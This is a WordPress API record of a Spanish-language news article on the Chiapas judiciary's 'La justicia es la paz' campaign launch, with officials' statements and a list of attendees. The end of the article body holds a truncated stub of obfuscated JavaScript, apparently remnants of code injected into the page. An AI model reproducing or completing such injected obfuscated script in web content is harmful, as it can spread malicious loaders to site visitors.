{"id":20293,"date":"2025-02-11T06:12:11","date_gmt":"2025-02-11T06:12:11","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20293"},"modified":"2025-02-11T06:12:12","modified_gmt":"2025-02-11T06:12:12","slug":"presenta-poder-judicial-campana-la-justicia-es-la-paz-clave-para-consolidar-el-humanismo-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20293","title":{"rendered":"Presenta Poder Judicial campa\u00f1a \u201cLa justicia es la paz\u201d, clave para consolidar el humanismo en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250210-WA0036-1-1024x683.jpg\" alt=\"\" class=\"wp-image-20294\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250210-WA0036-1-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250210-WA0036-1-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250210-WA0036-1-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250210-WA0036-1-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250210-WA0036-1-2048x1366.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>*El gobernador constitucional Eduardo Ram\u00edrez atestigua la ceremonia de presentaci\u00f3n en el recinto judicial.<br>*Juan Carlos Moreno Guill\u00e9n asegura que, para todas y todos, la justicia es la paz.<\/p>\n\n\n\n<p>El Poder Judicial del Estado de Chiapas, que preside el magistrado Juan Carlos Moreno Guill\u00e9n, realiz\u00f3 la presentaci\u00f3n de la campa\u00f1a \u201cLa justicia es la paz\u201d, pieza clave en el combate contra la corrupci\u00f3n, la erradicaci\u00f3n de malas pr\u00e1cticas y, sobre todo, la consolidaci\u00f3n de una justicia m\u00e1s humanista.<\/p>\n\n\n\n<p>Durante esta presentaci\u00f3n, el gobernador del estado, Eduardo Ram\u00edrez, realiz\u00f3 un recorrido hist\u00f3rico de nuestro sistema judicial, y recalc\u00f3 que la paz debe tener como principio la justicia; de ah\u00ed emana todo. A\u00f1adi\u00f3 que las y los juzgadores son los encargados de concretar el trabajo que realizan las instancias procuradoras de justicia; por lo que, en la misi\u00f3n de restablecer la paz en Chiapas, el Poder Judicial es pieza clave, y debe de hacer lo que le corresponde.<\/p>\n\n\n\n<p>En su intervenci\u00f3n, el magistrado presidente Juan Carlos Moreno Guill\u00e9n precis\u00f3 que: \u201cPara nuestros pueblos originarios; para nuestras comunidades; para nuestras mujeres; para nuestros adultos mayores; para nuestras personas con discapacidad; en fin, para todas las chiapanecas y todos los chiapanecos; y sobre todo, para nuestras generaciones futuras; en armon\u00eda con nuestros ancestros, en apego a nuestras tradiciones, inspirados en nuestros ideales y en raz\u00f3n a nuestra historia; la justicia es la paz\u201d.<\/p>\n\n\n\n<p>De igual manera, el presidente de la Mesa Directiva del Congreso, Luis Ignacio Avenda\u00f1o Berm\u00fadez, a\u00f1adi\u00f3 que la justicia es el pilar para el renacimiento de la paz en nuestro estado de Chiapas; por ello, debe ser entendida como una herramienta que da certeza a cada persona en su dignidad, forjando, a trav\u00e9s de la paz, un verdadero humanismo que transforma.<\/p>\n\n\n\n<p>Por su parte, la diputada Bertha Flores S\u00e1nchez recalc\u00f3 que la paz solo se establece cuando las personas se sienten tratadas con dignidad, calidez humana y se les brinda seguridad y certeza jur\u00eddica. Es un equilibrio delicado, pero el \u00fanico que puede garantizar una armon\u00eda duradera, sin impunidad, privilegios ni corrupci\u00f3n.<\/p>\n\n\n\n<p>Asimismo, la magistrada integrante del Pleno de Distrito de la Ponencia B, Claudia Luc\u00eda Dom\u00ednguez Acu\u00f1a, enmarc\u00f3 la frase \u201cno hay camino para la paz, la paz es el camino\u201d, la cual representa el anhelo de todas y todos los que trabajamos por Chiapas. Adem\u00e1s, asegur\u00f3 que la paz no es solo tarea de los Poderes del Estado, sino que nos corresponde a todas y todos los ciudadanos.<\/p>\n\n\n\n<p>Estuvieron presentes, el comandante de la 7a Regi\u00f3n Militar, Jos\u00e9 Joaqu\u00edn Jim\u00e9nez Cueto; el comandante de la 31a Zona Militar, general de Brigada Rom\u00e1n Villalvazo Barrios; el representante del comandante de la Regi\u00f3n \u00c1rea del Sureste, general Roberto Gonz\u00e1lez Piedras; el coordinador de la Guardia Nacional en Chiapas, comisario jefe Antonio Hern\u00e1ndez Tejeda; el presidente de la Junta de Coordinaci\u00f3n Pol\u00edtica, diputado Mario Guill\u00e9n Guill\u00e9n; el fiscal general del Estado, Jorge Luis Llaven Abarca; el secretario de Seguridad del Pueblo, \u00d3scar Alberto Aparicio Avenda\u00f1o; la secretaria Anticorrupci\u00f3n y Buen Gobierno, Ana Laura Romero Basurto; entre otras servidoras y servidores estatales y judiciales.<\/p>\n\n\n\n<p>#JusticiaConHumanismo<br>#PJEChiapas<br>#LaNuevaEraDeLaJusticia<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>*El gobernador constitucional Eduardo Ram\u00edrez atestigua la ceremonia de presentaci\u00f3n en el recinto judicial.*Juan Carlos Moreno Guill\u00e9n asegura que, para todas y todos, la justicia es la paz. El Poder Judicial del Estado de Chiapas, que preside el magistrado Juan Carlos Moreno Guill\u00e9n, realiz\u00f3 la presentaci\u00f3n de la campa\u00f1a \u201cLa justicia es la paz\u201d, pieza &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20294,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-20293","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20293","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20293"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20293\/revisions"}],"predecessor-version":[{"id":20295,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20293\/revisions\/20295"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20294"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20293"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20293"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20293"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}